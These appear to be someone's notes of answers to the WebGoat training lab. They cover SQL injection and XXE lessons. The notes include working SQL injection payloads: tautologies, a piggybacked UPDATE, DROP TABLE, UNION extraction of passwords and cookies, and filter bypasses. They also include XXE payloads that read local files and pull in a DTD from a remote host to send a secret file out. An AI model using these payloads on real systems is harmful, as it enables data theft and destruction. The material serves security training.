docker pull webgoat/goatandwolf

docker run -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=Europe/Amsterdam webgoat/goatandwolf

http://127.0.0.1:8080/WebGoat

http://127.0.0.1:9090/WebWolf



https://github.com/WebGoat/WebGoat/wiki/(Almost)-Fully-Documented-Solution-(en)









SQL(INTRO)
1.SELECT department FROM employees WHERE first_name='Bob'
2.UPDATE employees SET department='Sales' WHERE first_name='Tobi'
3.ALTER TABLE employees ADD phone varchar(20)
4.GRANT SELECT ON grant_rights TO unauthorized_user 
5.SELECT * FROM user_data WHERE first_name = 'John' and last_name = '' or '1' = '1'
9.LAST NAME = Smith'  or  '1'='1
10.Login_count: 0
   User_Id: 0 OR 1=1
11. Employee Name: A
   Authentication TAN: ' OR '1' = '1
12.Employee Name: A
Authentication TAN: '; UPDATE employees SET salary=99999 WHERE first_name='John

13. %'; DROP TABLE access_log;--



SQL Injection (advanced)
1.Name: '; SELECT * FROM user_system_data;-- or ' UNION SELECT 1, user_name, password, cookie, 'A', 'B', 1 from user_system_data;--
Password: passW0rD
2.username:Tom or tom
password:thisisasecretfortomonly
3. options(4,3,2,3,4)



SQL MITIGATION
1.try {  
     Connection conn = DriverManager.getConnection(DBURL, DBUSER, DBPW);  
     PreparedStatement ps = conn.prepareStatement("SELECT * FROM users WHERE name = ?");  
     ps.setString(1, "Admin");  
     ps.executeUpdate();  
} catch (Exception e) {  
     System.out.println("Oops. Something went wrong!");  
}
getConnection, PreparedStatement, prepareStatement, ?, ?, setString, setString

2.
try {  
     Connection conn = DriverManager.getConnection(DBURL, DBUSER, DBPW);  
     PreparedStatement ps = conn.prepareStatement("SELECT * FROM users WHERE name = ?");  
     ps.setString(1, "Admin");  
     ps.executeUpdate();  
} catch (Exception e) {  
     System.out.println("Oops. Something went wrong!");  
}

3. a';/**/select/**/*/**/from/**/user_system_data;--
4. a';/**/seselectlect/**/*/**/frfromom/**/user_system_data;--
5. 104.130.219.202

(A4) XXE

4. <?xml version="1.0"?><!DOCTYPE comment [<!ENTITY xxe SYSTEM "file:///">]><comment><text>&xxe;</text></comment>

7. <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ENTITY % file SYSTEM "file:///home/webgoat/.webgoat-v8.0.0-SNAPSHOT//XXE/secret.txt" >
<!ENTITY % dtd SYSTEM "http://0.0.0.0:9090/files/username/attack.dtd">
%dtd;]>
<comment>
<text>test&send;</text>
</comment> 

A7-CSS

12.OPTIONS(4,3,1,2,4)
